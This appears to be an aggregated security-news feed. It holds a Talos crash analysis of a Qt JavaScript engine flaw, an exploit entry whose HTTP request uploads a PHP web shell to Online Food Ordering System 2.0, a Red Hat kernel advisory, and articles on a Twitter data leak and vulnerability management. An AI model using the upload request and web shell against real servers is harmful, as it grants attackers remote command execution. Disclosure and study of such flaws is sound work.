       0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]
       0x96bfc6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+214>:    mov    QWORD PTR [r13+0x8],rcx
       0x96bfca <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+218>:    test   eax,eax
       0x96bfcc <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+220>:    mov    QWORD PTR [rsp],rdi
       0x96bfd0 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+224>:
        jle    0x96c072 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+386>
       0x96bfd6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+230>:    mov    QWORD PTR [rsp+0x8],rbp
       0x96bfdb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+235>:    mov    ebp,ebp
       0x96bfdd <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+237>:    lea    rdx,[rbp*8+0x0]
    (gdb) i r ebp
    ebp            0xe8754700          -394967296                                                                                                                              [7]
    (gdb) stepi
    0x000000000096bfbf in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) stepi
    0x000000000096bfc2 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/i $pc
    => 0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]                            [8]
    (gdb) i r rax
    rax            0xffffffffe8754700  -394967296
    (gdb) i r rdi
    rdi            0x7ffff4e845a0      140737302250912
    (gdb) stepi
    0x000000000096bfc6 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) i r rcx
    rcx            0x7fff38927da0      140734142512544
        (gdb) x/x $rcx                                                                                                           [9]
    0x7fff38927da0: Cannot access memory at address 0x7fff38927da0
    (gdb)
    

A breakpoint was set at \[6\] just before the pointer arithemtic. Observe that value of length is in 4 byte ebp register at \[7\]. The instruction at \[8\] actually calculates the new pointer by multiplying rax (sign extended length value from ebp) by the size of a pointer and adding it to rdi before storing it into rcx. The command at \[9\] shows that rcx now points to invalid memory. Any further operation using this pointer of length will result in additional memory corruption. Continuing execution finally leads to a following crash:

    (gdb) c
    Continuing.
    
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000da87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) c
    Continuing.
    UndefinedBehaviorSanitizer:DEADLYSIGNAL
    ==370803==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fff38927da0 (pc 0x000000da87d9 bp 0x7ffff48d1d20 sp 0x7fffffffd2c0 T370803)
    ==370803==The signal is caused by a WRITE memory access.
    [Detaching after fork from child process 370824]
        #0 0xda87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda87d9)
        #1 0x96c0de in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x96c0de)
        #2 0x985e7e in QV4::Runtime::CallProperty::call(QV4::ExecutionEngine*, QV4::Value const&, int, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x985e7e)
        #3 0x9d7bc5 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d7bc5)
        #4 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #5 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #6 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #7 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #8 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #9 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

The above crash is inside method_reverse which is the implementation of Array.reverse. However, the same vulnerability can be triggered through any target function supplied to Reflect.apply. Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**TIMELINE**

2022-09-27 - Initial Vendor Contact  
2022-10-11 - Vendor Disclosure  
2023-01-12 - Public Release

Emma Reuter and Theo Morales of Cisco ASIG.

CVE-2022-40983: TALOS-2022-1617 || Cisco Talos Intelligence Group

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/11/2023  
# Exploit Author: Onurcan Alcan  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Macos / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38679779537855109463517942658  
Content-Length: 1225  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=menu  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="id"

1  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="name"

Diet Coke  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="description"

In Can  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="status"

on  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="category_id"

3  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="price"

20  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="img"; filename="revcmd.php"  
Content-Type: text/php

<?  
?>  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<?  
if($_GET['cmd']) {  
  system($_GET['cmd']);  
  }  
?>  
</pre>  
</BODY></HTML>

-----------------------------38679779537855109463517942658--

Online Food Ordering System 2.0 Shell Upload

Red Hat Security Advisory 2023-0101-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:0101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0101  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RHEL8.4 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127849)

* vfio zero page mappings fail after 2M instances (BZ#2128515)

* ice: Driver Update up to 5.19 (BZ#2130992)

* atlantic: missing hybernate/resume fixes (BZ#2131935)

* Bluefield 2 DPU would crash and reboot due to a kernel panic (BZ#2134084)

* Fix issue that enables STABLE_WRITES by default and causes performance  
regressions (BZ#2135813)

* ice: Intel E810 PTP clock glitching (BZ#2136036)

* ice: configure link-down-on-close on and change interface mtu to 9000,the  
interface can't up (BZ#2136216)

* ice: dump additional CSRs for Tx hang debugging (BZ#2136513)

* ice,iavf: system panic during sriov sriov_test_cntvf_reboot testing  
(BZ#2137270)

* After upgrading to ocp4.11.1, our dpdk application using vlan strip  
offload is not working (BZ#2138157)

* i40e: orphaned-leaky memory when interacting with driver memory  
parameters (BZ#2138205)

* WARNING: CPU: 0 PID: 9637 at kernel/time/hrtimer.c:1309  
hrtimer_start_range_ns+0x35d/0x400 (BZ#2138953)

* DELL EMC 8.6-RT: System is not booting into RT Kernel with perc12.  
(BZ#2139216)

* Lenovo 8.7: The VGA display shows no signal when install RHEL8.7  
(BZ#2140152)

* Host Pod -> NodePort Service traffic (Host Backend - Same Node) Flow  
Iperf Cannot Pass Traffic (BZ#2141878)

* mlx5_core: mlx5_cmd_check messages scrolling with hardware offload  
enabled (BZ#2141957)

* net/ice: VIRTCHNL_OP_CONFIG_VSI_QUEUES command handling failure with  
in-tree driver (BZ#2142017)

* RHEL:8.6+ IBM Partner issue - Loopback driver with ABORT_TASKS causing  
hangs in scsi eh, this bug was cloned for RHEL8.6 and need this patch in  
8.6+ (BZ#2144583)

* AMdCLIENT 8.8: The kernel command line parameter "nomodeset" not working  
properly (BZ#2145218)

* Path loss during Volume Ownership Change on RHEL 8.7 SAS (BZ#2147374)

* net/ice: OP_SET_RSS_HENA command not supported with in-tree driver  
(BZ#2148130)

* iavf panic: iavf 0000:ca:01.0: Failed to init adminq: -53 (BZ#2149081)

* Intel 8.8 iavf: Driver Update (bugfixes) (BZ#2149742)

* Azure RHEL-8 PCI: hv: Do not set PCI_COMMAND_MEMORY to reduce VM boot  
time (BZ#2150912)

* RHEL-8.7: System fails to boot with soft lockup while loading/unloading  
an unsigned (E) kernel module. (BZ#2152206)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-425.10.1.el8_7.src.rpm

aarch64:  
bpftool-4.18.0-425.10.1.el8_7.aarch64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-425.10.1.el8_7.noarch.rpm  
kernel-doc-4.18.0-425.10.1.el8_7.noarch.rpm

ppc64le:  
bpftool-4.18.0-425.10.1.el8_7.ppc64le.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

s390x:  
bpftool-4.18.0-425.10.1.el8_7.s390x.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm

x86_64:  
bpftool-4.18.0-425.10.1.el8_7.x86_64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i69zjgjWX9erEAQi7og/+NmgRZHeaRAFdkzMYD9KOIoU1RNAlKAfu  
hJf63p0zW4JqRUcn7p+v3qFw84eBJR4Q+dWsx9I8IBKoZ+jZQQlvMOy17eXPnedD  
et7KieOv6+4YXYh9QDD6LzqXjrhdZCFVTbd2Yjhnsvll74o/r4T8at+MGZmAEbsc  
9vWDOyknBmusOnk1GcKKgvrOGfpw/WHKsn/O+iZAT3o1kEHxQoUF689rYGn/Nm56  
i+53s/QlbvXTAmiyMjMWTfM7fR899BRfYfEy0GCrFT7NOcXZ14DwZ4bgLXqeFaHv  
pIVDryqShKr6qUsp0Whb8y6RcqZebL57mCDmnGhrCn3O4n9RMtjn3ApDks9urp0t  
wmrO/TuejHqM9Agjyz2SZSJf23nJSoCxfssHkRPbd/NxPVv2a05iOe/GPrMdmA1D  
bLUKyIeAy8gxNzxIqrH/MmTlyddUVgy/3Oi15etSSRYxG3zPQYAIB3yxdVKxOS4K  
YJhZzL5OMQilO/dP3zYrGSjJkA5CTYU0laMs8QPDpBiKUJU8q/r7XRj6PS6THCOZ  
Xjpf66XYbT42v6Ly3lIvM+w6TZpy2NzxFBfq8Ab8J+ssUYzEpxlD7voZ0ca9rbzv  
V4SVdHzEpMITwqkW1OPjKMWYlFFkMn7RcgzU1jgxTTwN3y1IIJSVCU67NP4K+re7  
Vh1Z7+eM4CY=  
=B1Qw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0101-01

By Waqas
Twitter claims that “The data is likely a collection of data already publicly available online through different sources.”
This is a post from HackRead.com Read the original post: Twitter Denies Any Hack Attack in 200M Account Leak Scare

A threat actor had leaked 209 million Twitter accounts containing email addresses and other information on a hacker forum earlier in 2021.

The top data breach news of the new year 2023 was that a hacker had leaked the personal data of 209 million Twitter account users on a hacker forum. Some claimed the social network site had been compromised, while some suggested that the data had been obtained after exploiting some old vulnerability or bug.

However, Twitter has finally addressed the rumours and refuted the claims that it was hacked or that a trove of data was obtained by exploiting a vulnerability of Twitter systems.

The leaked database comprised usernames, follower counts, creation dates, and email addresses of Twitter users; no passwords, phone numbers, IP addresses, or physical addresses were leaked.

It is worth noting that Hackread.com had reported that the leaked data was obtained through web data scraping. For your information, data scraping or web scraping is the process of extracting data from websites. It can be done manually by a user, but it is more commonly done using automated tools.

**Twitter’s Response**

In its report published on Wednesday, January 11, 2023, Elon Musk’s Twitter said that “In response to recent media reports of Twitter users’ data being sold online, we conducted a thorough investigation and there is no evidence that data recently being sold was obtained by exploiting a vulnerability of Twitter systems,” said Twitter.

The social network giant also addressed other recent cybersecurity incidents related to Twitter, such as the data leak of 5.4 million Twitter accounts and the sale of 400 million accounts on different hacker forums.

Nevertheless, the company has categorically denied any malicious attempt or breach of its system. “Based on information and intel analyzed to investigate the issue, there is no evidence that the data being sold online was obtained by exploiting a vulnerability of Twitter systems,” Twitter added. “The data is likely a collection of data already publicly available online through different sources,” they said.

1.  APT Groups Trapping Targets with Clever Twitter Scheme
2.  Twitter phishing scam inspired by its latest security response
3.  Researcher logs into Trump’s Twitter with password MAGA2020
4.  Twitter hacker charged in sim swapping, cryptocurrency scheme
5.  Mastermind of 2020’s celebrity Twitter hack sentenced to 3 years

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Twitter Denies Any Hack Attack in 200M Account Leak Scare

A recently published Security Navigator report data shows that businesses are still taking 215 days to patch a reported vulnerability. Even for critical vulnerabilities, it generally takes more than 6 months to patch.
Good vulnerability management is not about being fast enough in patching all potential breaches. It's about focusing on the real risk using vulnerability prioritization to correct

A recently published Security Navigator report data shows that businesses are still taking 215 days to patch a reported vulnerability. Even for critical vulnerabilities, it generally takes more than 6 months to patch.

Good vulnerability management is not about being fast enough in patching all potential breaches. It's about focusing on the real risk using vulnerability prioritization to correct the most significant flaws and reduce the company's attack surface the most. Company data and threat intelligence need to be correlated and automated. This is essential to enable internal teams focus their remediation efforts. Suitable technologies can take the shape of a global Vulnerability Intelligence Platform. Such a platform can help to prioritize vulnerabilities using a risk score and let companies focus on their real organizational risk.

****Getting Started****

Three facts to have in mind before establishing an effective vulnerability management program:

1\. The number of discovered vulnerabilities increases every year. An average of 50 new vulnerabilities are discovered every day so we can easily understand that it's impossible to patch them all.

2\. Only some vulnerabilities are actively exploited and represent a very high risk to all organizations. Around 6% of all vulnerabilities are ever exploited in the wild\[43\]: we need to reduce the burden and focus on the real risk.

3\. The same vulnerability can have a completely different impact on the business and on the infrastructure of two distinct companies, so both the business exposure and the severity of the vulnerability need to be considered. Based on these facts we understand that there is no point in patching every vulnerability. Instead, we should focus on those that pose a real risk based on the threat landscape and the organizational context

****The concept of risk-based vulnerability management****

The objective is to focus on the most critical assets and the assets having a higher risk to be targeted by threat actors. To approach a risk-based vulnerability management program we need to consider two environments.

****The internal environment****

The Clients' landscape represents the internal environment. Companies' networks are growing and diversifying and so is their attack surface. The attack surface represents all components of the information system which can be reached by hackers. Having a clear and up-to-date view of your information system and of your attack surface is the very first step. It is also important to consider the business context. In effect, companies can be a greater target depending on their business sector due to specific data and documents they possess (intellectual property, classified defense…). The last key element to consider is the unique context of the company, individually. The objective is to classify assets according to their criticality and to highlight the most important ones. For instance: assets that if not available would cause an important disruption to business continuity, or highly confidential assets that if accessible would make the organization liable to multiple lawsuits.

****The external environment****

The threat landscape represents the external environment. This data isn't accessible from the internal network. Organizations need to have the human and financial resources to find and manage this information. Alternatively, this activity can be externalized to professionals who will monitor the threat landscape on the organization's behalf.

Knowing the vulnerabilities which are actively exploited is a must since they represent a higher risk for a company. These actively exploited vulnerabilities can be followed thanks to threat intelligence capabilities combined with vulnerability data. To have the most efficient results, it's even better to multiply the threat intelligence sources and correlate them. Understanding attacker activity is also valuable since it helps anticipating potential threats. For instance: intelligence concerning a new zero-day or a new ransomware attack can be actioned on a timely basis, to prevent a security incident.

Combining and understanding both environments will help organizations define their real risk, and pin-point more efficiently where preventative and remediation actions should be deployed. There is no need to apply hundreds of patches but rather ten of them, selected ones, that will drastically reduce an organization's attack surface.

****Five key steps to implement a risk-based vulnerability management program****

1.  **Identification:** Identify all your assets to discover your attack surface: a discovery scan can help having a first overview. Then launch regular scans on your internal and external environments and share the results to the Vulnerability Intelligence Platform.
2.  **Contextualization:** configure your business context as well as the criticality of your assets in the Vulnerability Intelligence Platform. The scanning results will then be contextualized with a specific risk scoring per asset.
3.  **Enrichment:** The scan results need to be enriched using additional sources provided by the Vulnerability Intelligence Platform, such as threat intelligence and attacker activity that will help to prioritize considering the threat landscape.
4.  **Remediation:** Thanks to the risk scoring given per vulnerability, which can be matched with threat intelligence criteria like "easily exploitable", "exploited in wild" or "widely exploited" for instance, prioritizing remediation effectively is much easier.
5.  **Evaluation:** Monitor and measure the progress of your vulnerability management program using KPIs and customized dashboards and reports. It's a continuous improvement process!

This is a story from the trenches found in the 2023 Security Navigator report. More on vulnerabilities and other interesting stuff including malware analysis and cyber extortion, as well as tons of facts and figures on the security landscape, can be found in the full report. You can download the 120+ page report for free on the Orange Cyberdefense website. So have a look, it's worth it!

_**Note:** This informative story was expertly crafted by Melanie Pilpre, product manager at Orange Cyberdefense._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel